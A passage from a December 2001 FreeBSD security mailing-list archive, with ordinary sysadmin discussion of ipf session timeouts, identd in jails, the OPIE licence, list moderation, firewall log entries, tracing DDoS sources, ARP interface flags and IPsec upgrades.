because keep-state directives in ipf.conf are still treating packets returned from
(e.g.) DNS queries as part of an existing session.

Is this right, and if so, how do I drop the time an idle session is marked as active
(the default is on the order of days, IIRC)?

There are also a lot of messages like this generated by localhost but that's not 
ipf's fault (since loopback is wide open).

-- 
Rasputin :: Jack of All Trades - Master of Nuns ::

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Dec  6  4:55:46 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11])
	by hub.freebsd.org (Postfix) with ESMTP id F1B3E37B417
	for <security@FreeBSD.ORG>; Thu,  6 Dec 2001 04:55:42 -0800 (PST)
Received: from cairo.anu.edu.au (localhost [127.0.0.1])
	by cairo.anu.edu.au (8.12.0/8.12.0) with ESMTP id fB6Ctd6V013758;
	Thu, 6 Dec 2001 23:55:40 +1100 (EST)
Received: (from avalon@localhost)
	by cairo.anu.edu.au (8.12.0/8.12.0.Beta16) id fB6CtcKO013756;
	Thu, 6 Dec 2001 23:55:38 +1100 (EST)
From: Darren Reed <avalon@cairo.anu.edu.au>
Message-Id: <200112061255.fB6CtcKO013756@cairo.anu.edu.au>
Subject: Re: ipf and log_in_vain
To: rasputin@submonkey.net
Date: Thu, 6 Dec 2001 23:55:38 +1100 (Australia/NSW)
Cc: security@FreeBSD.ORG
In-Reply-To: <20011206125224.A72358@shikima.mine.nu> from "Rasputin" at Dec 06, 2001 12:52:24 PM
X-Mailer: ELM [version 2.5 PL1]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

In some mail from Rasputin, sie said:
[...]
> If that's the case, I'm assuming that the reason they manage to pass through
> is because keep-state directives in ipf.conf are still treating packets
> returned from (e.g.) DNS queries as part of an existing session.

Sounds quite plausible.

> Is this right, and if so, how do I drop the time an idle session is
> marked as active
> (the default is on the order of days, IIRC)?

There is a UDP specific timeout - fr_udptimeout - accessible through sysctl.

Darren

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Dec  6  7: 8: 6 2001
Delivered-To: freebsd-security@freebsd.org
Received: from db.nexgen.com (db.nexgen.com [66.92.98.149])
	by hub.freebsd.org (Postfix) with SMTP id 6445237B405
	for <freebsd-security@freebsd.org>; Thu,  6 Dec 2001 07:08:02 -0800 (PST)
Received: (qmail 11494 invoked from network); 6 Dec 2001 15:07:18 -0000
Received: from localhost.nexgen.com (HELO alexus) (root@127.0.0.1)
  by localhost.nexgen.com with SMTP; 6 Dec 2001 15:07:18 -0000
Message-ID: <00d101c17e67$c8029bf0$0d00a8c0@alexus>
From: "alexus" <ml@db.nexgen.com>
To: "Przemyslaw Frasunek" <venglin@freebsd.lublin.pl>
Cc: <freebsd-security@freebsd.org>
References: <000901c17de6$c6a49730$0d00a8c0@alexus> <200112060819.fB68Jff27235@mailhost.freebsd.lublin.pl>
Subject: Re: identd inside of jail
Date: Thu, 6 Dec 2001 10:07:54 -0500
Organization: NexGen
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-2"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

i've tryed ident2 .. it won't work

i heard that any identd will work inside of jail if you using ipf/ipnat and
they won't work w/ ipfw/natd

are you using ipfw/natd ? or ipf/ipnat?

----- Original Message -----
From: "Przemyslaw Frasunek" <venglin@freebsd.lublin.pl>
To: "alexus" <ml@db.nexgen.com>
Cc: <freebsd-security@freebsd.org>
Sent: Thursday, December 06, 2001 3:19 AM
Subject: Re: identd inside of jail


> On Thursday 06 December 2001 00:44, you wrote:
> > did anyone sucseed on making identd (from inetd) or any other identd to
> > work inside of jail?
>
> use ident2 from ports. it works fine in jail.
>
> --
> * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
> * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *
>


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Dec  6  7: 8:52 2001
Delivered-To: freebsd-security@freebsd.org
Received: from db.nexgen.com (db.nexgen.com [66.92.98.149])
	by hub.freebsd.org (Postfix) with SMTP id 83D9737B419
	for <freebsd-security@FreeBSD.ORG>; Thu,  6 Dec 2001 07:08:46 -0800 (PST)
Received: (qmail 11511 invoked from network); 6 Dec 2001 15:08:04 -0000
Received: from localhost.nexgen.com (HELO alexus) (root@127.0.0.1)
  by localhost.nexgen.com with SMTP; 6 Dec 2001 15:08:04 -0000
Message-ID: <00dd01c17e67$e31c0480$0d00a8c0@alexus>
From: "alexus" <ml@db.nexgen.com>
To: "Crist J . Clark" <cjc@FreeBSD.ORG>
Cc: <freebsd-security@FreeBSD.ORG>
References: <000901c17de6$c6a49730$0d00a8c0@alexus> <20011206003719.S3061@blossom.cjclark.org>
Subject: Re: identd inside of jail
Date: Thu, 6 Dec 2001 10:08:39 -0500
Organization: NexGen
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

well ..

can you suggest somethin here?

----- Original Message -----
From: "Crist J . Clark" <cjc@FreeBSD.ORG>
To: "alexus" <ml@db.nexgen.com>
Cc: <freebsd-security@FreeBSD.ORG>
Sent: Thursday, December 06, 2001 3:37 AM
Subject: Re: identd inside of jail


> On Wed, Dec 05, 2001 at 06:44:26PM -0500, alexus wrote:
> > Hello
> >
> > I'm posting on this thread on this list due to jail itself is a security
> > related issue, if this is wrong list i'll repost it on another list.
> >
> > did anyone sucseed on making identd (from inetd) or any other identd to
work
> > inside of jail?
>
> I don't think the auth service in inetd(8) will work in a jail. I
> believe the "net.inet.tcp.getcred" sysctl(3) fails.
>
> > the identd itself is working, however to make it work for outside world
too
> > i put forward for port 113 using natd
> >
> > su-2.05# grep 113 /etc/natd.conf
> > redirect_port tcp jail:113 113
>
> And running it through a NATing gateway opens up a whole bunch of other
> issues that have nothing to do with jail(8).
> --
> "It's always funny until someone gets hurt. Then it's hilarious."
>
> Crist J. Clark                     |     cjclark@alum.mit.edu
>                                    |     cjclark@jhu.edu
> http://people.freebsd.org/~cjc/    |     cjc@freebsd.org
>


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Dec  6  9:30:43 2001
Delivered-To: freebsd-security@freebsd.org
Received: from storm.FreeBSD.org.uk (storm.FreeBSD.org.uk [194.242.139.170])
	by hub.freebsd.org (Postfix) with ESMTP
	id 69C1537B420; Thu,  6 Dec 2001 09:30:37 -0800 (PST)
Received: (from uucp@localhost)
	by storm.FreeBSD.org.uk (8.11.6/8.11.6) with UUCP id fB6HToL15585;
	Thu, 6 Dec 2001 17:29:50 GMT
	(envelope-from mark@grondar.za)
Received: from grondar.za (mark@localhost [127.0.0.1])
	by grimreaper.grondar.org (8.11.6/8.11.6) with ESMTP id fB6HQpU47930;
	Thu, 6 Dec 2001 17:26:51 GMT
	(envelope-from mark@grondar.za)
Message-Id: <200112061726.fB6HQpU47930@grimreaper.grondar.org>
To: Will Andrews <will@csociety.org>
Cc: Pomegranate <daver@flag.blackened.net>, cjc@FreeBSD.ORG,
	peter.jeremy@alcatel.com.au, freebsd-security@FreeBSD.ORG
Subject: Re: OPIE mailing list 
References: <20011204153218.J56385@squall.waterspout.com> 
In-Reply-To: <20011204153218.J56385@squall.waterspout.com> ; from Will Andrews <will@csociety.org>  "Tue, 04 Dec 2001 15:32:18 EST."
Date: Thu, 06 Dec 2001 17:26:51 +0000
From: Mark Murray <mark@grondar.za>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

> I don't know what you're implying, but the core team has nothing
> to do with maintaining FreeBSD's OPIE.  Perhaps you should submit
> a patch to get it upgraded instead of screaming at people who
> never claimed to be trying to maintain the OPIE code.  Sheesh.

OPIE 2.4(provisional) has a "no redistribute" license. Therefore,
we can't use it.

M
-- 
o       Mark Murray
\_      FreeBSD Services Limited
O.\_    Warning: this .sig is umop ap!sdn

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Dec  6 10:45: 2 2001
Delivered-To: freebsd-security@freebsd.org
Received: from yez.hyperreal.org (h0050ba8912fb.ne.mediaone.net [66.31.228.14])
	by hub.freebsd.org (Postfix) with SMTP id A427037B42C
	for <freebsd-security@FreeBSD.ORG>; Thu,  6 Dec 2001 10:44:42 -0800 (PST)
Received: (qmail 5778 invoked by uid 1000); 6 Dec 2001 06:37:19 -0000
Received: from localhost (sendmail-bs@127.0.0.1)
  by localhost with SMTP; 6 Dec 2001 06:37:19 -0000
Date: Wed, 5 Dec 2001 22:37:19 -0800 (PST)
From: Brian Behlendorf <brian@hyperreal.org>
X-X-Sender: brian@localhost
To: Owner of many system processes <william@hq.newdream.net>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: (WOT) Re: the best edited picture ever
In-Reply-To: <20011206044206.GD12011@hq.newdream.net>
Message-ID: <20011205222931.L5713-100000@localhost>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Wed, 5 Dec 2001, Owner of many system processes wrote:
> closing the list to off-list subscribers seems to be the simplest
> option, and while it might be annoying, there could be some sort of
> alternate method of allowing people to post to the list (maybe a web
> form for non-subscribers or something)?

I don't know about majordomo or mailman, but in ezmlm, one can configure
it such that subscribers posts go through, and non-subscribers posts get
bounced for moderation (which are easy to approve, and moderation
responsibilities can be shared), and in the process of approving a message
a moderator can also add said user to a list of "allowed" posters.  So
pretty quickly all those posting from alternate addresses or the
occasional useful outsider get in that allowed list, and the stuff that
gets caught ends up being mostly spam.

My only worry is that it's a list about security, where time is critical,
and if a moderator fails to approve a post it could be a Really Bad Thing;
you don't want to see "vendor was notified, but didn't bother to respond"
in a bugtraq post about a FreeBSD vulnerability.  Moderation posts that
are ignored time out after ten days and go back to the original poster,
with an explanation that the moderator "didn't act upon" it, so at least
stuff doesn't get lost.  The challenge with sharing moderation is that
every moderator gets every moderation request, and it's only the first
response that is considered, so there'd be lots of wasted time spent or
potentially miscommunication, "oh, I thought Bob was going to handle it
this week", etc.

I've wanted to create a web UI for moderators that listed all curent
unapproved messages in the queue, so that you wouldn't get that
duplication.  Maybe you'd have a daily reminder email of the messages in
the queue so people who are event-driven and never can remember to visit
particular sites regularly (like me) wouldn't forget.

Blah blah.

	Brian


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Dec  6 10:51:53 2001
Delivered-To: freebsd-security@freebsd.org
Received: from snipe.prod.itd.earthlink.net (snipe.mail.pas.earthlink.net [207.217.120.62])
	by hub.freebsd.org (Postfix) with ESMTP id BD8C637B405
	for <security@freebsd.org>; Thu,  6 Dec 2001 10:51:50 -0800 (PST)
Received: from dialup-209.245.139.202.dial1.sanjose1.level3.net ([209.245.139.202] helo=blossom.cjclark.org)
	by snipe.prod.itd.earthlink.net with esmtp (Exim 3.33 #1)
	id 16C3cb-0006O7-00; Thu, 06 Dec 2001 10:51:50 -0800
Received: (from cjc@localhost)
	by blossom.cjclark.org (8.11.6/8.11.3) id fB6Ipko09595;
	Thu, 6 Dec 2001 10:51:46 -0800 (PST)
	(envelope-from cjc)
Date: Thu, 6 Dec 2001 10:51:46 -0800
From: "Crist J . Clark" <cristjc@earthlink.net>
To: Ronan Lucio <ronan@melim.com.br>
Cc: security@FreeBSD.ORG
Subject: Re: Securty logs
Message-ID: <20011206105146.A8975@blossom.cjclark.org>
Reply-To: cjclark@alum.mit.edu
References: <02f601c17dab$85743670$2aa8a8c0@melim.com.br> <20011205135449.E3061@blossom.cjclark.org> <00c001c17e4e$f14cb6d0$2aa8a8c0@melim.com.br>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <00c001c17e4e$f14cb6d0$2aa8a8c0@melim.com.br>; from ronan@melim.com.br on Thu, Dec 06, 2001 at 10:10:06AM -0200
X-URL: http://people.freebsd.org/~cjc/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Thu, Dec 06, 2001 at 10:10:06AM -0200, Ronan Lucio wrote:
> Hi Cris,
> 
> > > If I have icmp 8,0 denied for external computers, when
> > > someone pings, it create an entry in security log file:
> > >
> > > Dec  5 14:01:12 server /kernel: ipfw: 3000 Deny ICMP:8.0 62.211.157.214
> > > 255.255.255.255 in via fxp0
> > >
> > > But if such computer give a flood attack, I think it will
> > > create the same entry.
> > >
> > > How can I identify if an entry in security log file was creted
> > > by simple ping or by a flood attack?
> >
> > By how many of those log entries you get. Each packet will generate a
> > message.
> 
> I did a test:
> 
> I pinged for the machine and typed Ctrl-C.
> The pind returned 9 packets sent/0 packets received.
> 
> In the security log of the target machine it shows just one line.

But did it say something like,

  Dec  5 14:01:12 server /kernel: ipfw: 3000 Deny ICMP:8.0 62.211.157.214 255.255.255.255 in via fxp0
  Dec  5 14:01:21 server last message repeated 8 times

Each packet will generate a message, but syslogd(8) may use its
mechanism for supressing duplicate messages and print a "last message
repeated" line.
-- 
"It's always funny until someone gets hurt. Then it's hilarious."

Crist J. Clark                     |     cjclark@alum.mit.edu
                                   |     cjclark@jhu.edu
http://people.freebsd.org/~cjc/    |     cjc@freebsd.org

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Dec  6 10:53:35 2001
Delivered-To: freebsd-security@freebsd.org
Received: from salseiros.melim.com.br (salseiros.melim.com.br [200.215.110.23])
	by hub.freebsd.org (Postfix) with ESMTP id 2C7B137B41B
	for <security@freebsd.org>; Thu,  6 Dec 2001 10:53:23 -0800 (PST)
Received: from fazendinha (ressacada.melim.com.br [200.215.110.4])
	by salseiros.melim.com.br (Postfix) with SMTP id 66B34BAEE
	for <security@freebsd.org>; Thu,  6 Dec 2001 16:53:03 -0200 (BRST)
Message-ID: <045101c17e87$7c9922e0$2aa8a8c0@melim.com.br>
From: "Ronan Lucio" <ronan@melim.com.br>
To: <security@freebsd.org>
Subject: Attacks DDoS
Date: Thu, 6 Dec 2001 16:54:48 -0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Hi All,

Does anybody know if is there a way to find out where a DDoS attack
come from?

Thank�s
Ronan


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Dec  6 10:56: 6 2001
Delivered-To: freebsd-security@freebsd.org
Received: from pogo.caustic.org (caustic.org [64.163.147.186])
	by hub.freebsd.org (Postfix) with ESMTP id 4887D37B416
	for <freebsd-security@FreeBSD.ORG>; Thu,  6 Dec 2001 10:56:00 -0800 (PST)
Received: from localhost (jan@localhost)
	by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id fB6ItxH16187;
	Thu, 6 Dec 2001 10:55:59 -0800 (PST)
	(envelope-from jan@caustic.org)
Date: Thu, 6 Dec 2001 10:55:59 -0800 (PST)
From: "f.johan.beisser" <jan@caustic.org>
X-X-Sender:  <jan@localhost>
To: Brian Behlendorf <brian@hyperreal.org>
Cc: <freebsd-security@FreeBSD.ORG>
Subject: Re: (WOT) Re: the best edited picture ever
In-Reply-To: <20011205222931.L5713-100000@localhost>
Message-ID: <20011206104901.I16958-100000@localhost>
X-Ignore: This statement isn't supposed to be read by you
X-TO-THE-FBI-CIA-AND-NSA: HI! HOW YA DOIN?
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Wed, 5 Dec 2001, Brian Behlendorf wrote:

> I don't know about majordomo or mailman, but in ezmlm, one can configure
> it such that subscribers posts go through, and non-subscribers posts get
> bounced for moderation (which are easy to approve, and moderation
> responsibilities can be shared), and in the process of approving a message
> a moderator can also add said user to a list of "allowed" posters.  So
> pretty quickly all those posting from alternate addresses or the
> occasional useful outsider get in that allowed list, and the stuff that
> gets caught ends up being mostly spam.

mail man allows this..

> My only worry is that it's a list about security, where time is critical,
> and if a moderator fails to approve a post it could be a Really Bad Thing;
> you don't want to see "vendor was notified, but didn't bother to respond"
> in a bugtraq post about a FreeBSD vulnerability.

The freebsd page pretty much tells people to send security vulnerabilities
to security-officer@freebsd.org. the security information page is also
directly linked from the front page, although it could be a bit more
obvious. i believe (but i can't be sure, since i'm not one of the
security-officer folk) that the address is bounced to several people,
including kris kenneway.

http://www.freebsd.org/security/

anyhow, just as an FYI.

-- jan


-------/ f. johan beisser /--------------------------------------+
  http://caustic.org/~jan                      jan@caustic.org
    "John Ashcroft is really just the reanimated corpse
         of J. Edgar Hoover." -- Tim Triche


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Dec  6 11: 0:35 2001
Delivered-To: freebsd-security@freebsd.org
Received: from pogo.caustic.org (caustic.org [64.163.147.186])
	by hub.freebsd.org (Postfix) with ESMTP id EC83137B405
	for <security@FreeBSD.ORG>; Thu,  6 Dec 2001 11:00:30 -0800 (PST)
Received: from localhost (jan@localhost)
	by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id fB6J0Ql16210;
	Thu, 6 Dec 2001 11:00:26 -0800 (PST)
	(envelope-from jan@caustic.org)
Date: Thu, 6 Dec 2001 11:00:26 -0800 (PST)
From: "f.johan.beisser" <jan@caustic.org>
X-X-Sender:  <jan@localhost>
To: Ronan Lucio <ronan@melim.com.br>
Cc: <security@FreeBSD.ORG>
Subject: Re: Attacks DDoS
In-Reply-To: <045101c17e87$7c9922e0$2aa8a8c0@melim.com.br>
Message-ID: <20011206105611.J16958-100000@localhost>
X-Ignore: This statement isn't supposed to be read by you
X-TO-THE-FBI-CIA-AND-NSA: HI! HOW YA DOIN?
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Thu, 6 Dec 2001, Ronan Lucio wrote:

> Hi All,
>
> Does anybody know if is there a way to find out where a DDoS attack
> come from?

yes. you can start by analysing the incoming packets, and start contacting
the owners of that network. the problem is that this can lead to several
hundred contacts, over a very large amount of networks and contacts.

assuming they co-operate, they can then track down who's issuing the
commands to the various zombie/slave machines.

sadly, outside of this, there's not much you can do about a DDoS,
considering the first D stands for distributed.. it's designed to be hard
to track down, and hard to stop.

 -------/ f. johan beisser /--------------------------------------+
    "John Ashcroft is really just the reanimated corpse
         of J. Edgar Hoover." -- Tim Triche


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Dec  6 12:59:47 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail-green.research.att.com (H-135-207-30-103.research.att.com [135.207.30.103])
	by hub.freebsd.org (Postfix) with ESMTP
	id 0BA6937B405; Thu,  6 Dec 2001 12:59:41 -0800 (PST)
Received: from alliance.research.att.com (alliance.research.att.com [135.207.26.26])
	by mail-green.research.att.com (Postfix) with ESMTP
	id 7E1EF1E07C; Thu,  6 Dec 2001 15:59:40 -0500 (EST)
Received: from windsor.research.att.com (windsor.research.att.com [135.207.26.46])
	by alliance.research.att.com (8.8.7/8.8.7) with ESMTP id PAA27865;
	Thu, 6 Dec 2001 15:59:39 -0500 (EST)
From: Bill Fenner <fenner@research.att.com>
Received: (from fenner@localhost)
	by windsor.research.att.com (8.8.8+Sun/8.8.5) id MAA02282;
	Thu, 6 Dec 2001 12:59:39 -0800 (PST)
Message-Id: <200112062059.MAA02282@windsor.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
To: cjclark@alum.mit.edu
Subject: Re: NOARP - gateway must answer and have frozen ARP table
Cc: net@freebsd.org, security@freebsd.org
References:  <20011205124430.A83642@svzserv.kemerovo.su> <20011205040316.H40864@blossom.cjclark.org> <20011205231735.A1361@grosbein.pp.ru> <20011205193859.B79705@sunbay.com> <200112051835.fB5IZqH95521@whizzo.transsys.com> <20011205204526.B89520@sunbay.com> <200112051852.fB5IqmH95809@whizzo.transsys.com> <20011205121928.A3061@blossom.cjclark.org>
Date: Thu, 6 Dec 2001 12:59:39 -0800
Versions: dmail (solaris) 2.2j/makemail 2.9b
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


Garrett and I discussed what IFF_NOARP should mean about 4-5 years
ago; we decided that it probably menat "no ARP".  We discussed
the idea of seperating it out into two flags; "Don't reply to ARP"
and "don't pay attention to ARP" but decided to wait and see what
people thought.  4-5 years is probably enough time to wait =)

My proposal: keep IFF_NOARP, but add IFF_NOSENDARP and IFF_NOREPLYARP
(or something, I'm no good at making up names).  I agree with Louie
that it makes sense for these to be per-interface as opposed to
Ruslan's sysctl.

  Bill

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Dec  6 15: 7:13 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mine.kame.net (kame195.kame.net [203.178.141.195])
	by hub.freebsd.org (Postfix) with ESMTP id 5712E37B421
	for <freebsd-security@FreeBSD.ORG>; Thu,  6 Dec 2001 15:07:08 -0800 (PST)
Received: from localhost ([3ffe:501:41c:2000:f5b8:e3ad:b861:da85])
	by mine.kame.net (8.11.1/3.7W) with ESMTP id fB6N0SL05738;
	Fri, 7 Dec 2001 08:00:28 +0900 (JST)
To: jack_xiao99@hotmail.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: SA regenerated problems
In-Reply-To: Your message of "Thu, 6 Dec 2001 10:32:13 -0500"
	<OE66oIndJ6L41xbt3a600003bc6@hotmail.com>
References: <OE66oIndJ6L41xbt3a600003bc6@hotmail.com>
X-Mailer: Cue version 0.6 (011026-1440/sakane)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Message-Id: <20011207080722Z.sakane@kame.net>
Date: Fri, 07 Dec 2001 08:07:22 +0900
From: Shoichi Sakane <sakane@kame.net>
X-Dispatcher: imput version 20000228(IM140)
Lines: 11
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

> Thanks for your answer, I almost get the answer. Actually, there is some
> problem in the kernel ipsec stack, the version of KAME I am using is too
> old. Some one suggested me to upgrade to FreeBSD4.4. Any thoughts about
> that?

upgrading to new version is one of good solutions.
i believe there is no problem of the ipsec manual configuration
in the freebsd4.2 ipsec stack.  when you use latest racoon on the 4.2,
some functions of racoon may not be used.

/Shoichi Sakane @ KAME project/

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Dec  6 16:56:51 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp.ieg.com.br (huxley.protocoloweb.com.br [200.185.63.26])
	by hub.freebsd.org (Postfix) with ESMTP id 7ED5837B42F
	for <FreeBSD-security@FreeBSD.org>; Thu,  6 Dec 2001 16:56:00 -0800 (PST)
Received: from TmpStr (200-207-52-210.dsl.telesp.net.br [200.207.52.210])
	by smtp.ieg.com.br (ieG relay/8.9.3) with SMTP id fB70t8D95808
	for <FreeBSD-security@FreeBSD.org>; Thu, 6 Dec 2001 22:55:08 -0200 (BRST)
Message-Id: <200112070055.fB70t8D95808@smtp.ieg.com.br>
Reply-To: "Keila - Curitiba" <arosadesaron@zipmail.com.br>
From: "Keila - Curitiba" <arosadesaron@zipmail.com.br>
To: "" <FreeBSD-security@FreeBSD.org>
Organization: 
X-Priority: 3
X-MSMail-Priority: Normal
Subject: CONVITE HP ALERTA
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Date: Thu, 6 Dec 2001 22:59:12 -0200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Ol�!
